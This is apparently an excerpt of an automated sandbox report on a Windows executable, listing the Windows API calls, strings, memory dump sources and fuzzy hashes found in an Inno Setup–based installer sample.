                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 530164218-0
                                                                                            • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                            • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                            • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                            • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                            • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                            • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                            • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                            • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                            • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                            • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                            • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                            • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                            • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                            • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                            APIs
                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 1611563598-0
                                                                                            • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                            • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                            • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                            • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                            • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                            • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                            • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DestroyWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3375834691-0
                                                                                            • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                            • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                            • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                            • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                            • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                            • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                            • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                            • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                            • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                            • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1452528299-0
                                                                                            • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                            • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                            • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                            • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                            • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                            • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                            • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                            APIs
                                                                                            • LocalAlloc.KERNEL32(00000000,00000644,?,0049B450,004013A3,?,?,00401443,?,?,?,?,?,00401983), ref: 00401353
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocLocal
                                                                                            • String ID:
                                                                                            • API String ID: 3494564517-0
                                                                                            • Opcode ID: 833cffc3d4ae6fddf196a7017a3fa962a39b4640526386715143ff6d9bbaf8a6
                                                                                            • Instruction ID: 71c91fbc4c3ed8fd369fb1531a6952d3d9178ec9d6227f0a2e7a8dd8dab45303
                                                                                            • Opcode Fuzzy Hash: 833cffc3d4ae6fddf196a7017a3fa962a39b4640526386715143ff6d9bbaf8a6
                                                                                            • Instruction Fuzzy Hash: 0CF05E717013018FE724CF29D980656B7E1EBA9365F24807EE5C5D7761D3358C419B94
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                            • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                            • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                            • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                            • API String ID: 2323315520-3614243559
                                                                                            • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                            • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                            • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                            • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 0045862F
                                                                                            • QueryPerformanceCounter.KERNEL32(02123858,00000000,004588C2,?,?,02123858,00000000,?,00458FBE,?,02123858,00000000), ref: 00458638
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(02123858,02123858), ref: 00458642
                                                                                            • GetCurrentProcessId.KERNEL32(?,02123858,00000000,004588C2,?,?,02123858,00000000,?,00458FBE,?,02123858,00000000), ref: 0045864B
                                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02123858,02123858), ref: 004586CF
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                            • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                            • API String ID: 770386003-3271284199
                                                                                            • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                            • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                            • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                            • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                            APIs
                                                                                              • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                              • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                              • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                              • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC), ref: 004783CC
                                                                                              • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
